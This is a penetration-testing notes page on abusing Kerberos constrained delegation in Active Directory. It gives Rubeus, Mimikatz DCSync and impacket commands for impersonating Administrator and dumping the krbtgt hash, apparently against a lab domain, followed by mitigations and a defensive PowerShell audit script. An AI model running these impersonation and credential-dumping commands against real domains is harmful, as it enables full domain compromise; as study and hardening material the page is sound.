# Kerberos Constrained Delegation

### User Account <a href="#user-account" id="user-account"></a>

#### Prerequisites <a href="#prerequisites" id="prerequisites"></a>

Hunting for user accounts that have Kerberos constrained delegation enabled:

{% code title="" %}

```powershell
Get-NetUser -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

{% endcode %}

In the screenshot below, the user `spot` is allowed to delegate, in other words to impersonate any user and authenticate to the file system service (CIFS) on the domain controller DC01.

The account must have the `TRUSTED_TO_AUTH_FOR_DELEGATION` flag set in its `userAccountControl` attribute in order to be able to authenticate to the remote service.

> TRUSTED\_TO\_AUTH\_FOR\_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.
>
> <https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties>

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FEtejm8yeAs083trUs418%2Fimage.png?alt=media&#x26;token=1d203a80-8217-4cf2-83e8-b036da748db4" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
rubeus.exe asktgt /user:userName /domain:DomainName /ntlm:Hash /outfile:FileName.tgt
```

{% endcode %}

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FfRqlODOeEyCPckalg0D5%2Fimage.png?alt=media&#x26;token=90ec30c7-78e7-47b5-bc3c-17cd91525652" alt=""><figcaption><p>TGT ticket for the websvc account.</p></figcaption></figure>

{% code overflow="wrap" %}

```bash
.\Rubeus.exe s4u /ticket:TGT_Ticket /msdsspn:"service/HOST" /impersonateuser:Administrator /ptt
```

{% endcode %}

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2Fi5oFZbNEmyeQRGIOcmtb%2Fimage.png?alt=media&#x26;token=e8ad531c-028c-424e-82c3-bcbfab5cf886" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2Fxznfo959fj86JWxCt1Vp%2Fimage.png?alt=media&#x26;token=bd39ae9a-5924-4c01-b474-b5a0593ce53b" alt=""><figcaption></figcaption></figure>

```powershell
invoke-Mimikatz -command '"lsadump::dcsync /user:abdo\krbtgt "'
```

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FXHdPAd7rtmHNT7VOjOI9%2Fimage.png?alt=media&#x26;token=1321b9cd-8d6e-4560-95a1-0277ca190609" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
impacket-getST   -k -impersonate administrator -spn cifs/HayStack.thm.corp -dc-ip 10.10.43.21 thm.corp/DARLA_WINTERS
```

{% endcode %}

## Mitigation <a href="#id-660b" id="id-660b"></a>

* To mitigate the abuse of delegated accounts, ensure that privileged accounts are configured as "*Account is sensitive and cannot be delegated*" in Active Directory, or add them to the Protected Users group to prevent delegation.
* If delegation is needed for specific accounts, secure them with firewall rules that permit only the traffic needed for delegation to the required service, and limit any other privileged access that is not necessary.
* Also, ensure the delegated accounts use strong passwords to protect them against attacks like Kerberoasting.
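
The following added example (not part of the original page) turns the `TRUSTED_TO_AUTH_FOR_DELEGATION` flag described under Prerequisites and the first mitigation bullet into an audit: it reports which delegating accounts have protocol transition enabled and target a domain controller, and which privileged accounts are neither marked sensitive nor in Protected Users. The function names, the `example.local` domain and the sample objects are assumptions constructed for illustration; the flag values come from the Microsoft `userAccountControl` article quoted above.

```powershell
# Added example (not from the original page). Input objects mimic the output of:
#   Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties msDS-AllowedToDelegateTo,userAccountControl,sAMAccountName
#   Get-ADUser   -LDAPFilter '(adminCount=1)' -Properties userAccountControl,memberOf
$NOT_DELEGATED                  = 0x100000    # "Account is sensitive and cannot be delegated"
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition

function Get-DelegationRisk {                 # hypothetical helper name
    param([object[]]$Delegators, [string[]]$DomainControllers)
    foreach ($a in $Delegators) {
        $spns = @($a.'msDS-AllowedToDelegateTo')
        # Compare the short host name of each SPN (service/host[:port]) with the DC list
        $toDc = @($spns | Where-Object {
            $hostPart = ($_ -split '/')[1] -replace ':\d+$', ''
            $DomainControllers -contains ($hostPart -split '\.')[0]
        })
        [pscustomobject]@{
            Account            = $a.sAMAccountName
            ProtocolTransition = [bool]($a.userAccountControl -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            AllowedSpns        = $spns -join ', '
            TargetsDC          = $toDc.Count -gt 0
        }
    }
}

function Get-UnprotectedPrivilegedAccount {   # hypothetical helper name
    param([object[]]$Privileged)
    # An account can be impersonated via delegation if it has neither protection
    $Privileged | Where-Object {
        -not ($_.userAccountControl -band $NOT_DELEGATED) -and
        -not (@($_.memberOf) -match '^CN=Protected Users,')
    } | ForEach-Object { $_.sAMAccountName }
}

# Constructed sample data; only spot, CIFS and DC01 come from the page
$delegators = @(
    [pscustomobject]@{ sAMAccountName = 'spot'; userAccountControl = 0x1000200
                       'msDS-AllowedToDelegateTo' = @('CIFS/DC01', 'CIFS/DC01.example.local') }
    [pscustomobject]@{ sAMAccountName = 'svc-app'; userAccountControl = 0x200
                       'msDS-AllowedToDelegateTo' = @('HTTP/app01.example.local') }
)
$privileged = @(
    [pscustomobject]@{ sAMAccountName = 'Administrator'; userAccountControl = 0x200; memberOf = @() }
    [pscustomobject]@{ sAMAccountName = 'da-sensitive'; userAccountControl = 0x100200; memberOf = @() }
    [pscustomobject]@{ sAMAccountName = 'da-protected'; userAccountControl = 0x200
                       memberOf = @('CN=Protected Users,CN=Users,DC=example,DC=local') }
)

Get-DelegationRisk -Delegators $delegators -DomainControllers 'DC01' | Format-Table -AutoSize
Get-UnprotectedPrivilegedAccount -Privileged $privileged
```

Against a live domain, feed the two functions the results of the `Get-ADObject` and `Get-ADUser` queries named in the leading comments instead of the sample arrays.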

